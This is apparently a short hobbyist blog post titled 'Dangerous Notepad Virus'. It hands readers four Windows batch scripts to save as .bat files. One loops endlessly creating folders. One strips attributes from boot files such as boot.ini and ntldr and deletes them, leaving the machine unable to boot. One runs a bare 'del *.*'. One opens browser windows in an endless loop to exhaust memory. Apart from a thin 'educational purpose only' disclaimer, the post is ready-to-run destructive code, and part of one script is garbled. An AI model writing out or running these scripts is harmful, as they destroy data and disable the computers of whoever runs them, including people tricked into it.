Dangerous Notepad Virus

Hi! frnz. Many of You know about notpad tricks. This post is also related to notepad tricks but dangerous tricks which cannot be used as fun. But also if you want it for knowledge than here are some of them.
But use them in your own risks. In this post you will find code for:
1. Create more than 3,000 folders under a minute
2. Shutdown a computer forever
3. Delete all your system
4. Crashing your RAM



                                                                                                                                                                                     

1. Create more than 3,000 folders under a minute

@echo off
:top
md %random%
goto top



 2. Shutdown a computer forever

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini

 3. Delete all your system

file.
del *.*

 4. Crashing your RAM

:A
start http://actiontrick.blogspot.com/
goto A

_________________________________________________________________________________

Type all the above code in notepad and save it as .bat file.

Warning:- Don't use it for destruction or fun. It is real and it is just for educational purpose only.

Actiontrick.blogspot.com is not responsible for any loss caused by it.


No comments:

Post a Comment